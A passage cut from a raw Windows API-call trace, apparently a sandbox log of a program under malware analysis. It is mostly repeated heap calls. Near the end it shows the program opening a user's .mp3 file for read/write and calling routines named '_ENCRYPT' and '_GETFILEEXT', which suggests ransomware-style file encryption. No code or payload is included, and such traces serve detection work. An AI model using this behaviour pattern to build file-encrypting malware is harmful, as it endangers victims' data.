hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.145] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd750 [0188.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd750, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0188.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.146] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0188.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0188.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd750, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0188.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.147] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0188.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0188.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0188.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x36) returned 0x90ad98 [0188.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", cchWideChar=54, lpMultiByteStr=0x90ad98, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", lpUsedDefaultChar=0x0) returned 54 [0188.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0188.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0188.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.148] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rpbhryzip5cjl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6c) returned 0x906f38 [0188.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=54, lpWideCharStr=0x906f38, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3") returned 54 [0188.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0188.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0188.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0188.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.150] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.152] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.152] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.152] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.152] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.152] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.153] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.153] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.153] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.154] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.162] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.162] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", 